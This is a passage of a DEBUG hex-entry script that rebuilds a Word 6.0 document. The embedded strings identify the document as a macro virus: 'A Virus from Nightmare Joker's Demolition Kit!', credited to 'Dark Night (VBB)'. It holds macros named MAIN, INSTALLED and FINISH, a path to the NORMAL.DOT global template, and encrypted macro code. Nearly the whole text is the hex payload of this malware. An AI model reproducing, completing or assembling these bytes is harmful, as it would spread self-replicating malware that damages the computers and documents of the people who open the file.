E 0A40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0A50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0A60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0A70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0A80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0A90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0AA0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0AB0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0AC0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0AD0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0AE0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0AF0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0B00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0B10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0B20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0B30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0B40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0B50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0B60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0B70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0B80 9C 00 1A 02 02 01 02 00 00 00 EB 02 00 00 3A 00
E 0B90 7A 00 00 00 00 00 64 00 00 00 00 00 00 00 00 00
E 0BA0 57 00 00 00 00 00 00 00 44 00 00 00 00 00 3A 00
E 0BB0 00 00 01 01 04 4D 41 49 4E 01 2A 00 08 00 00 00
E 0BC0 00 00 00 00 2A 00 8C 00 00 00 00 00 00 01 07 46
E 0BD0 49 4E 49 53 48 32 00 00 00 00 00 00 00 00 00 00
E 0BE0 01 01 49 00 00 00 00 00 00 00 00 00 00 01 0A 56
E 0BF0 49 4E 53 54 41 4C 4C 45 44 00 00 00 94 00 00 00
E 0C00 00 00 00 01 06 46 49 4E 49 53 48 00 00 00 3A 00
E 0C10 6D 01 00 00 00 00 3A 00 E9 02 00 00 01 00 09 02
E 0C20 03 00 21 02 19 00 00 00 03 00 28 10 00 00 AC 87
E 0C30 00 01 17 00 00 00 00 00 00 00 00 00 00 00 01 00
E 0C40 27 02 03 00 66 02 19 00 05 00 01 00 08 00 00 00
E 0C50 00 00 04 01 12 00 00 00 00 00 00 00 00 00 00 00
E 0C60 01 00 6C 02 03 00 84 02 19 00 00 00 03 00 0F 01
E 0C70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0C80 0D 06 00 A4 82 2E A5 C6 41 00 00 00 00 00 00 00
E 0C90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0CA0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0CB0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0CC0 FE FF 00 00 03 5F 00 00 00 00 00 00 00 00 00 00
E 0CD0 00 00 00 00 00 00 00 00 01 00 00 00 E0 85 9F F2
E 0CE0 F9 4F 68 10 AB 91 08 00 2B 27 B3 D9 30 00 00 00
E 0CF0 8C 02 00 00 0D 00 00 00 07 00 00 00 98 00 00 00
E 0D00 05 00 53 00 75 00 6D 00 6D 00 61 00 72 00 79 00
E 0D10 49 00 6E 00 66 00 6F 00 72 00 6D 00 61 00 74 00
E 0D20 69 00 6F 00 6E 00 00 00 00 00 00 00 00 00 00 00
E 0D30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0D40 28 00 02 00 FF FF FF FF FF FF FF FF FF FF FF FF
E 0D50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0D60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0D70 00 00 00 00 0F 00 00 00 BC 02 00 00 00 00 00 00
E 0D80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0D90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0DA0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0DB0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0DC0 00 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF
E 0DD0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0DE0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0DF0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0E00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0E10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0E20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0E30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0E40 00 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF
E 0E50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0E60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0E70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0E80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0E90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0EA0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0EB0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0EC0 00 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF
E 0ED0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0EE0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0EF0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0F00 04 00 00 00 DC 00 00 00 08 00 00 00 00 01 00 00
E 0F10 0C 00 00 00 24 01 00 00 0B 00 00 00 48 01 00 00
E 0F20 0D 00 00 00 6C 01 00 00 0F 00 00 00 90 01 00 00
E 0F30 10 00 00 00 B4 01 00 00 0A 00 00 00 D8 01 00 00
E 0F40 12 00 00 00 FC 01 00 00 0E 00 00 00 20 02 00 00
E 0F50 09 00 00 00 44 02 00 00 13 00 00 00 68 02 00 00
E 0F60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0F70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0F80 00 00 00 00 00 00 00 00 1E 00 00 00 28 00 00 00
E 0F90 43 3A 5C 57 49 4E 41 50 50 53 5C 4D 53 4F 46 46
E 0FA0 49 43 45 5C 57 49 4E 57 4F 52 44 36 5C 4E 4F 52
E 0FB0 4D 41 4C 2E 44 4F 54 00 00 00 00 00 00 00 00 00
E 0FC0 00 00 00 00 00 00 00 00 00 00 00 00 1E 00 00 00
E 0FD0 0B 00 00 00 44 61 72 6B 20 4E 69 67 68 74 00 00
E 0FE0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0FF0 1E 00 00 00 0B 00 00 00 44 61 72 6B 20 4E 69 67
E 1000 68 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1010 00 00 00 00 40 00 00 00 00 4C 20 58 F0 D9 BA 01
E 1020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1030 00 00 00 00 00 00 00 00 40 00 00 00 00 C0 A4 59
E 1040 8B B7 DE 01 00 00 00 00 00 00 00 00 00 00 00 00
E 1050 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00
E 1060 00 4C 20 58 F0 D9 BA 01 00 00 00 00 00 00 00 00
E 1070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1080 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 10A0 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00
E 10B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 10C0 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
E 10D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 10E0 00 00 00 00 00 00 00 00 00 00 00 00 1E 00 00 00
E 10F0 13 00 00 00 4D 69 63 72 6F 73 6F 66 74 20 57 6F
E 1100 72 64 20 36 2E 30 00 00 00 00 00 00 00 00 00 00
E 1110 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1130 00 00 00 00 1E 00 00 00 02 00 00 00 32 00 00 00
E 1140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1150 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00
E 1160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 11A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 11B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 11C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 11D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 11E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 11F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 12A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 12B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 12C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 12D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 12E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 12F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1300 DC A5 65 00 2D C0 09 08 00 00 01 00 65 00 00 00
E 1310 00 00 00 00 00 00 00 00 00 03 00 00 01 03 00 00
E 1320 BE 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1330 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00
E 1340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1350 00 00 00 00 00 00 00 00 00 0E 00 00 6A 00 00 00
E 1360 00 0E 00 00 6A 00 00 00 6A 0E 00 00 00 00 00 00
E 1370 6A 0E 00 00 00 00 00 00 6A 0E 00 00 00 00 00 00
E 1380 6A 0E 00 00 00 00 00 00 6A 0E 00 00 14 00 00 00
E 1390 7E 0E 00 00 00 00 00 00 7E 0E 00 00 00 00 00 00
E 13A0 7E 0E 00 00 00 00 00 00 7E 0E 00 00 00 00 00 00
E 13B0 7E 0E 00 00 00 00 00 00 7E 0E 00 00 0A 00 00 00
E 13C0 88 0E 00 00 0A 00 00 00 7E 0E 00 00 00 00 00 00
E 13D0 11 12 00 00 31 00 00 00 92 0E 00 00 00 00 00 00
E 13E0 92 0E 00 00 00 00 00 00 92 0E 00 00 00 00 00 00
E 13F0 92 0E 00 00 00 00 00 00 92 0E 00 00 00 00 00 00
E 1400 92 0E 00 00 00 00 00 00 92 0E 00 00 00 00 00 00
E 1410 92 0E 00 00 00 00 00 00 DF 0E 00 00 F2 00 00 00
E 1420 D1 0F 00 00 00 00 00 00 D1 0F 00 00 00 00 00 00
E 1430 D1 0F 00 00 1E 00 00 00 EF 0F 00 00 02 01 00 00
E 1440 F1 10 00 00 02 01 00 00 F3 11 00 00 1E 00 00 00
E 1450 42 12 00 00 54 00 00 00 96 12 00 00 28 00 00 00
E 1460 11 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1470 00 00 00 00 00 00 00 00 6A 0E 00 00 00 00 00 00
E 1480 92 0E 00 00 00 00 00 00 00 00 05 00 06 00 01 00
E 1490 01 00 92 0E 00 00 00 00 00 00 92 0E 00 00 00 00
E 14A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 14B0 00 00 92 0E 00 00 00 00 00 00 92 0E 00 00 00 00
E 14C0 00 00 11 12 00 00 00 00 00 00 92 0E 00 00 00 00
E 14D0 00 00 6A 0E 00 00 00 00 00 00 6A 0E 00 00 00 00
E 14E0 00 00 92 0E 00 00 00 00 00 00 00 00 00 00 00 00
E 14F0 00 00 00 00 00 00 00 00 00 00 92 0E 00 00 00 00
E 1500 00 00 92 0E 00 00 00 00 00 00 92 0E 00 00 00 00
E 1510 00 00 92 0E 00 00 00 00 00 00 92 0E 00 00 00 00
E 1520 00 00 6A 0E 00 00 00 00 00 00 92 0E 00 00 00 00
E 1530 00 00 6A 0E 00 00 00 00 00 00 92 0E 00 00 00 00
E 1540 00 00 DF 0E 00 00 00 00 00 00 00 00 00 00 00 00
E 1550 00 00 00 00 00 00 00 00 00 00 7E 0E 00 00 00 00
E 1560 00 00 7E 0E 00 00 00 00 00 00 6A 0E 00 00 00 00
E 1570 00 00 6A 0E 00 00 00 00 00 00 6A 0E 00 00 00 00
E 1580 00 00 6A 0E 00 00 00 00 00 00 92 0E 00 00 00 00
E 1590 00 00 DF 0E 00 00 00 00 00 00 92 0E 00 00 4D 00
E 15A0 00 00 92 0E 00 00 00 00 00 00 00 00 00 00 00 00
E 15B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 15C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 15D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 15E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 15F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1600 0D 06 00 A4 82 2E A5 C6 41 01 00 64 1B 69 04 4D
E 1610 41 49 4E 64 64 70 2F 20 41 20 56 69 72 75 73 20
E 1620 66 72 6F 6D 20 4E 69 67 68 74 6D 61 72 65 20 4A
E 1630 6F 6B 65 72 27 73 20 44 65 6D 6F 6C 69 74 69 6F
E 1640 6E 20 4B 69 74 21 64 70 2C 20 54 72 61 6E 73 6C
E 1650 61 74 65 64 20 69 6E 74 6F 20 45 6E 67 6C 69 73
E 1660 68 20 62 79 20 44 61 72 6B 20 4E 69 67 68 74 20
E 1670 28 56 42 42 29 64 64 1A 1B 8C 8D E9 96 E4 89 C0
E 1680 CC C4 C3 E9 FD 98 AD C2 E3 AD C8 FF FF E2 FF AD
E 1690 CA E2 F9 E2 AD CB E4 E3 E4 FE E5 E9 E9 AE E4 8C
E 16A0 E4 81 E1 8C 8D A9 EA 3A 0D 88 E1 8C 8D 9F E1 8D
E 16B0 8D 8B E9 DF 90 EA 35 0D 88 E4 8C E4 9F E1 8C 8D
E 16C0 9F E1 8C 8D 8B 81 E7 8B CC FF EE E5 E4 E8 93 E9
E 16D0 E2 8F E4 87 DB C4 E3 FE F9 EC E1 E1 E8 E9 81 E1
E 16E0 8C 8D E9 DF 97 90 E9 AB E4 8C E4 E9 E9 90 E4 87
E 16F0 DB C4 E3 FE F9 EC E1 E1 E8 E9 81 E1 8C 8D 93 E9
E 1700 DF A7 E4 8B CB E4 E3 E4 FE E5 E9 AD E9 DF A1 A0
E 1710 95 AB E9 DF EA D9 8D FE 46 8D 81 E1 8C 8D E9 DF
E 1720 EA 4F 0D E7 82 CA E1 E2 EF EC E1 B7 CC F8 F9 E2
E 1730 C2 FD E8 E3 9F EA A8 0D 88 8B 8A E7 84 B7 CC F8
E 1740 F9 E2 C2 FD E8 E3 9F E1 8C 8D E9 DF EA 4F 0D E7
E 1750 80 CA E1 E2 EF EC E1 B7 CC FF EE E5 E4 E8 9F EA
E 1760 A8 0D 88 8B 8A E7 8A B7 CC FF EE E5 E4 E8 E9 DF
E 1770 EA 4F 0D E7 82 CA E1 E2 EF EC E1 B7 CC F8 F9 E2
E 1780 C8 F5 E8 EE 9F EA A8 0D 88 8B 8A E7 84 B7 CC F8
E 1790 F9 E2 C8 F5 E8 EE 9F E1 8C 8D E9 DF EA 4F 0D E7
E 17A0 83 CA E1 E2 EF EC E1 B7 CC F8 F9 E2 C3 E8 FA 9F
E 17B0 EA A8 0D 88 8B 8A E7 85 B7 CC F8 F9 E2 C3 E8 FA
E 17C0 9F E1 8C 8D E9 DF EA 4F 0D E7 9D CA E1 E2 EF EC
E 17D0 E1 B7 CC F8 F9 E2 CE E1 E2 FE E8 9F EA A8 0D 88
E 17E0 8B 8A E7 87 B7 CC F8 F9 E2 CE E1 E2 FE E8 9F E1
E 17F0 8C 8D E9 DF EA 2E 0D E1 8C 8D 9F E1 8D 8D E9 97
E 1800 90 E9 E8 8B CB E4 E3 E4 FE E5 94 E9 97 96 DF DE
E 1810 BA C5 B7 DA 93 9F 97 90 BA F2 F3 F4 B7 D9 98 B7
E 1820 B0 B7 AD B6 EC BA BA FD B7 DF B7 D2 B2 DF DE FA
E 1830 B9 69 5E DB B2 DE DE CC B2 DE DE D8 BA 8C C3 B9
E 1840 66 5E DB B7 DF B7 CC B2 DE DE CC B2 DE DE D8 D2
E 1850 B4 D8 9F AC BD B6 B7 BB C0 BA B1 DC B7 D4 88 97
E 1860 B0 AD AA BF B2 B2 BB BA D2 B2 DF DE BA 8C C4 C3
E 1870 BA F8 B7 DF B7 BA BA C3 B7 D4 88 97 B0 AD AA BF
E 1880 B2 B2 BB BA D2 B2 DF DE C0 BA 8C F4 B7 D8 98 B7
E 1890 B0 B7 AD B6 BA FE BA 8C F2 F3 C6 F8 BA 8C B9 1C
E 18A0 5E B9 FB 5E DB D8 D9 B4 D9 E4 9F AC BD B6 B7 BB
E 18B0 CC B4 D3 99 B2 B1 BC BF B2 E4 9F AC BD B6 B7 BB
E 18C0 BA 8C B9 1C 5E B9 FB 5E DB D8 D9 B4 D6 E4 9F AB
E 18D0 AA B1 90 BB A9 CC B4 D0 99 B2 B1 BC BF B2 E4 9F
E 18E0 AB AA B1 90 BB A9 CC B2 DF DE BA 8C B9 1C 5E B9
E 18F0 FB 5E DB D8 D9 B4 D4 E4 9F AB AA B1 9D B2 B1 AD
E 1900 BB CC B4 CE 99 B2 B1 BC BF B2 E4 9F AB AA B1 9D
E 1910 B2 B1 AD BB CC B2 DF DE BA 8C B9 1C 5E B9 FB 5E
E 1920 DB D8 D9 B4 D7 E4 9F AB AA B1 9B A6 BB BD CC B4
E 1930 D1 99 B2 B1 BC BF B2 E4 9F AB AA B1 9B A6 BB BD
E 1940 CC B2 DF DE BA 8C B9 1C 5E B9 FB 5E DB D8 D9 B4
E 1950 D7 E4 9F AB AA B1 91 AE BB B0 CC B4 D1 99 B2 B1
E 1960 BC BF B2 E4 9F AB AA B1 91 AE BB B0 CC B2 DF DE
E 1970 BA C4 C3 BA BB D9 98 B7 B0 B7 AD B6 EC C7 BA F2
E 1980 F3 F4 B7 D8 98 B7 B0 B7 AD B6 BA BA FD B7 DF B7
E 1990 D2 B2 DF DE FA B9 69 5E DB B2 DF DE CC B2 DE DE
E 19A0 D8 BA 8C C3 B9 66 5E DB B7 DF B7 CC B2 DF DE CC
E 19B0 B2 DF DE D8 D2 B4 D8 9F AC BD B6 B7 BB C0 BA B1
E 19C0 DC B7 D4 88 97 B0 AD AA BF B2 B2 BB BA D2 B2 DF
E 19D0 DE BA 8C C4 C3 BA F8 B7 DF B7 BA BA C3 B7 D4 88
E 19E0 97 B0 AD AA BF B2 B2 BB BA D2 B2 DF DE C0 BA 8C
E 19F0 F4 B7 D8 98 B7 B0 B7 AD B6 BA FE BA 8C F2 F3 C6
E 1A00 F8 BA 8C B9 8A DE AD 15 DE D2 B2 DF DE BA 8C B9
E 1A10 1C 5E B9 FB 5E DB D8 D9 B4 D9 E4 9F AC BD B6 B7
E 1A20 BB CC B4 D3 99 B2 B1 BC BF B2 E4 9F AC BD B6 B7
E 1A30 BB BA 8C B9 1C 5E B9 FB 5E DB D8 D9 B4 D6 E4 9F
E 1A40 AB AA B1 90 BB A9 CC B4 D0 99 B2 B1 BC BF B2 E4
E 1A50 9F AB AA B1 90 BB A9 CC B2 DF DE BA 8C B9 1C 5E
E 1A60 B9 FB 5E DB D8 D9 B4 D4 E4 9F AB AA B1 9D B2 B1
E 1A70 AD BB CC B4 CE 99 B2 B1 BC BF B2 E4 9F AB AA B1
E 1A80 9D B2 B1 AD BB CC B2 DF DE BA 8C B9 1C 5E B9 FB
E 1A90 5E DB D8 D9 B4 D7 E4 9F AB AA B1 9B A6 BB BD CC
E 1AA0 B4 D1 99 B2 B1 BC BF B2 E4 9F AB AA B1 9B A6 BB
E 1AB0 BD CC B2 DF DE BA 8C B9 1C 5E B9 FB 5E DB D8 D9
E 1AC0 B4 D7 E4 9F AB AA B1 91 AE BB B0 CC B4 D1 99 B2
E 1AD0 B1 BC BF B2 E4 9F AB AA B1 91 AE BB B0 CC B2 DF
E 1AE0 DE BA 8C B9 7D 5E B2 DF DE CC B2 DE DE BA C4 C3
E 1AF0 BA BB D8 98 B7 B0 B7 AD B6 C7 BA C4 C5 83 82 E6
E 1B00 99 EB 86 CF C3 CB CC E6 E6 AB EB 8A C3 F7 F6 ED
E 1B10 CD F2 E7 EC E6 E6 98 99 CE CF AB D4 A6 CB 82 8E
E 1B20 86 81 AB E3 E2 E5 A6 C9 89 A6 A1 A6 BC A7 AB AB
E 1B30 EC A6 CE A6 C3 A3 CE CF EB A8 78 4F CA A3 CE CF
E 1B40 DD A3 CF CF C9 AB 9D D2 A8 77 4F CA A6 CE A6 DD
E 1B50 A3 CE CF DD A3 CE CF C9 C3 A5 C9 8E BD AC A7 A6
E 1B60 AA D1 AB A0 CD A6 C5 99 86 A1 BC BB AE A3 A3 AA
E 1B70 AB C3 A3 CE CF AB 9D D5 D2 AB E9 A6 CE A6 AB AB
E 1B80 D2 A6 C5 99 86 A1 BC BB AE A3 A3 AA AB C3 A3 CE
E 1B90 CF D1 AB 9D E5 A6 C9 89 A6 A1 A6 BC A7 AB EF AB
E 1BA0 9D E3 E2 D7 E9 AB 9D A8 9B CF BC 04 CF C3 A3 CE
E 1BB0 CF AB 9D A8 0D 4F A5 C0 88 A3 A0 AD AE A3 F5 8E
E 1BC0 BA BB A0 80 BF AA A1 DD A8 EA 4F CA C9 C8 A5 C6
E 1BD0 F5 8E BA BB A0 80 BF AA A1 DD A3 CE CF AB 9D A8
E 1BE0 0D 4F A5 C2 88 A3 A0 AD AE A3 F5 8E BD AC A7 A6
E 1BF0 AA DD A8 EA 4F CA C9 C8 A5 C8 F5 8E BD AC A7 A6
E 1C00 AA AB 9D A8 0D 4F A5 C0 88 A3 A0 AD AE A3 F5 8E
E 1C10 BA BB A0 8A B7 AA AC DD A8 EA 4F CA C9 C8 A5 C6
E 1C20 F5 8E BA BB A0 8A B7 AA AC DD A3 CE CF AB 9D A8
E 1C30 0D 4F A5 C1 88 A3 A0 AD AE A3 F5 8E BA BB A0 81
E 1C40 AA B8 DD A8 EA 4F CA C9 C8 A5 C7 F5 8E BA BB A0
E 1C50 81 AA B8 DD A3 CE CF AB 9D A8 0D 4F A5 DF 88 A3
E 1C60 A0 AD AE A3 F5 8E BA BB A0 8C A3 A0 BC AA DD A8
E 1C70 EA 4F CA C9 C8 A5 C5 F5 8E BA BB A0 8C A3 A0 BC
E 1C80 AA DD A3 CE CF AB 9D A8 6C 4F A3 CE CF DD A3 CF
E 1C90 CF AB D5 D2 AB AA C9 89 A6 A1 A6 BC A7 D6 AB D5
E 1CA0 D4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1CB0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1CC0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1CD0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1CE0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1CF0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1D00 00 03 00 00 01 03 00 00 A1 09 00 00 00 FE 00 00
E 1D10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1D20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1D30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1D40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1D50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1D60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1D70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1D80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1D90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1DA0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1DB0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1DC0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1DD0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1DE0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1DF0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1E00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1E10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1E20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1E30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1E40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1E50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1E60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1E70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1E80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1E90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1EA0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1EB0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1EC0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1ED0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1EE0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1EF0 00 00 00 00 00 00 00 00 00 00 00 00 02 75 01 02
E 1F00 00 03 00 00 01 03 00 00 FE 00 00 00 00 00 00 00
E 1F10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1F20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1F30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1F40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1F50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1F60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1F70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1F80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1F90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1FA0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1FB0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1FC0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1FD0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1FE0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 1FF0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 2090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 20A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 20B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 20C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 20D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 20E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 20F0 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 01
E 2100 0E 00 0F 00 08 00 01 00 4B 00 0F 00 00 00 00 00
E 2110 1A 00 00 40 F1 FF 02 00 1A 00 06 4E 6F 72 6D 61
